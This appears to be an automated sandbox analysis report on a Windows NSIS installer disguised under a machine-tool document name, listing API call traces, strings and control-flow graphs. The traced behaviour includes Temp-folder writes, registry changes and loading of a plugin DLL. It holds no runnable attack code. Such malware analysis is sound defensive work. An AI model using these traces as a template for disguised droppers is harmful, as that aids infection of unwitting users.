Memory Dump Source
• Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsz3421.tmp$C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll$C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs$Call
                                                                                                                                                                                                                          • API String ID: 1941528284-2685272807
Memory Dump Source
• Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: df052f8500bc354d4a21ff453bca24a979c322da877604b446898ac79d7ea655
                                                                                                                                                                                                                          • Instruction ID: 747aed367833ce7965c7456030a986fa8c308b51e1337f5c25afca0a07e996cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df052f8500bc354d4a21ff453bca24a979c322da877604b446898ac79d7ea655
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F17670D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(766B3410,00421570,Unconsiderately97.gra,004058A0,Unconsiderately97.gra,Unconsiderately97.gra,00000000,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\), ref: 0040600C
                                                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 00406018
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                          • String ID: Unconsiderately97.gra
                                                                                                                                                                                                                          • API String ID: 2295610775-3192565651

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A4B
                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403A68
                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403A7C
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A98
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403AB9
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ACD
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403AD4
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403B82
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403B8C
                                                                                                                                                                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403BA6
                                                                                                                                                                                                                          • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403BF7
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403C9D
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403CBE
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CD0
                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403CEB
                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403D01
                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403D08
                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403D20
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D33
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Hil Setup: Installing,?,Hil Setup: Installing,00422F20), ref: 00403D5C
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,Hil Setup: Installing), ref: 00403D6B
                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403E9F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                          • String ID: Click Next to continue.$Hil Setup: Installing$LN
                                                                                                                                                                                                                          • API String ID: 3282139019-1732471241

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(1033,Hil Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Hil Setup: Installing,00000000,00000002,766B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",00000000), ref: 004036F8
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\falden\myotonias\nonvoting,1033,Hil Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Hil Setup: Installing,00000000,00000002,766B3410), ref: 0040376D
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403780
                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 0040378B
                                                                                                                                                                                                                          • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\falden\myotonias\nonvoting), ref: 004037D4
                                                                                                                                                                                                                            • Part of subcall function 00405C5B: wsprintfA.USER32 ref: 00405C68
                                                                                                                                                                                                                          • RegisterClassA.USER32(00422EC0), ref: 00403811
                                                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403829
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040385E
                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403894
                                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 004038C0
                                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 004038CD
                                                                                                                                                                                                                          • RegisterClassA.USER32(00422EC0), ref: 004038D6
                                                                                                                                                                                                                          • DialogBoxParamA.USER32(?,00000000,00403A0F,00000000), ref: 004038F5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\falden\myotonias\nonvoting$Call$Control Panel\Desktop\ResourceLocale$Hil Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb

Control-flow Graph: function at 00402C66 (graph not reproduced)
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C77
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,00000400), ref: 00402C93
                                                                                                                                                                                                                            • Part of subcall function 00405970: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 00405974
                                                                                                                                                                                                                            • Part of subcall function 00405970: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405996
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 00402CDF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error launching installer, xrefs: 00402CB6
                                                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                                                                                                                                                          • SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, xrefs: 00402CD3
                                                                                                                                                                                                                          • C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                                                                                                                                                                          • Null, xrefs: 00402D5D
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe", xrefs: 00402C66
                                                                                                                                                                                                                          • soft, xrefs: 00402D54
                                                                                                                                                                                                                          • hA, xrefs: 00402CF4
                                                                                                                                                                                                                          • Inst, xrefs: 00402D4B
                                                                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe$soft$hA

Control-flow Graph: function at 00404F16 (graph not reproduced)
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00402FCF,00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000), ref: 00404F72
                                                                                                                                                                                                                          • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll), ref: 00404F84
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 837 4053dc-405427 CreateDirectoryA 838 405429-40542b 837->838 839 40542d-40543a GetLastError 837->839 840 405454-405456 838->840 839->840 841 40543c-405450 SetFileSecurityA 839->841 841->838 842 405452 GetLastError 841->842 842->840
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405433
                                                                                                                                                                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405448
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405452
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                          • String ID: ,s@$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                                                          • API String ID: 3449924974-3660268831

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 843 402e9f-402eb3 844 402eb5 843->844 845 402ebc-402ec4 843->845 844->845 846 402ec6 845->846 847 402ecb-402ed0 845->847 846->847 848 402ee0-402eed call 40307b 847->848 849 402ed2-402edb call 403091 847->849 853 403032 848->853 854 402ef3-402ef7 848->854 849->848 855 403034-403035 853->855 856 40301b-40301d 854->856 857 402efd-402f1d GetTickCount call 406175 854->857 858 403074-403078 855->858 859 403066-40306a 856->859 860 40301f-403022 856->860 867 403071 857->867 868 402f23-402f2b 857->868 863 403037-40303d 859->863 864 40306c 859->864 865 403024 860->865 866 403027-403030 call 40307b 860->866 870 403042-403050 call 40307b 863->870 871 40303f 863->871 864->867 865->866 866->853 876 40306e 866->876 867->858 872 402f30-402f3e call 40307b 868->872 873 402f2d 868->873 870->853 880 403052-40305e call 405a17 870->880 871->870 872->853 881 402f44-402f4d 872->881 873->872 876->867 886 403060-403063 880->886 887 403017-403019 880->887 883 402f53-402f70 call 406195 881->883 889 403013-403015 883->889 890 402f76-402f8d GetTickCount 883->890 886->859 887->855 889->855 891 402fd2-402fd4 890->891 892 402f8f-402f97 890->892 893 402fd6-402fda 891->893 894 403007-40300b 891->894 895 402f99-402f9d 892->895 896 402f9f-402fca MulDiv wsprintfA call 404f16 892->896 897 402fdc-402fe1 call 405a17 893->897 898 402fef-402ff5 893->898 894->868 899 403011 894->899 895->891 895->896 903 402fcf 896->903 904 402fe6-402fe8 897->904 902 402ffb-402fff 898->902 899->867 902->883 905 403005 902->905 903->891 904->887 906 402fea-402fed 904->906 905->867 906->902
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                                                          • API String ID: 551687249-2449383134

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 907 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 914 4023b0-4023b8 907->914 915 4028cf-4028de 907->915 917 4023c8-4023cb 914->917 918 4023ba-4023c7 call 402a3a lstrlenA 914->918 921 4023db-4023de 917->921 922 4023cd-4023da call 402a1d 917->922 918->917 925 4023e0-4023ea call 402e9f 921->925 926 4023ef-402403 RegSetValueExA 921->926 922->921 925->926 928 402405 926->928 929 402408-4024de RegCloseKey 926->929 928->929 929->915 932 4026a6-4026ad 929->932 932->915
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz3421.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz3421.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz3421.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsz3421.tmp
                                                                                                                                                                                                                          • API String ID: 1356686001-2647695323

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 933 406028-406048 GetSystemDirectoryA 934 40604a 933->934 935 40604c-40604e 933->935 934->935 936 406050-406058 935->936 937 40605e-406060 935->937 936->937 938 40605a-40605c 936->938 939 406061-40608f wsprintfA LoadLibraryA 937->939 938->939
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603F
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406078
                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?), ref: 00406088
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                          • String ID: %s%s.dll$\
                                                                                                                                                                                                                          • API String ID: 2200240437-500877883

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004059B3
                                                                                                                                                                                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059CD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A2
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe", xrefs: 0040599F
                                                                                                                                                                                                                          • nsa, xrefs: 004059AA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                          • API String ID: 1716503409-3165751043

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                                                            • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                                                                                                                                            • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                                                                                                                                                                            • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1791698881-3916222277
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405CFD: lstrcpynA.KERNEL32(?,?,00000400,0040318B,00422F20,NSIS Error), ref: 00405D0A
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(?,?,Unconsiderately97.gra,?,00405874,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405816
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040581B
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040582F
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Unconsiderately97.gra,00000000,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B0
                                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(Unconsiderately97.gra,Unconsiderately97.gra,Unconsiderately97.gra,Unconsiderately97.gra,Unconsiderately97.gra,Unconsiderately97.gra,00000000,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\), ref: 004058C0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$Unconsiderately97.gra
                                                                                                                                                                                                                          • API String ID: 3248276644-424640219
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 00401FBB
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00402FCF,00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000), ref: 00404F72
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll), ref: 00404F84
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FCB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 00402045
                                                                                                                                                                                                                          Memory Dump Source
